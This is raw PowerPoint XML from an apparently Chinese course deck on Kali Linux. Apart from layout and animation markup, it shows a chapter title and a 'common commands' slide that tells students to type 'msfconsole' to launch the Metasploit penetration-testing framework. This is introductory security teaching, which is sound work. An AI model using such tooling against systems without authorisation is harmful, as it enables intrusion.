                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="文本框 116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999990" y="932498"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令，打开Metasploit框架，如图2-4-7所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999990" y="1577658"/>
            <a:ext cx="5276850" cy="3571875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="文本框 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999990" y="5149533"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-7 启动Metasploit框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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bldLvl="0" animBg="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="6" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="7" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="8" grpId="0"/>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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
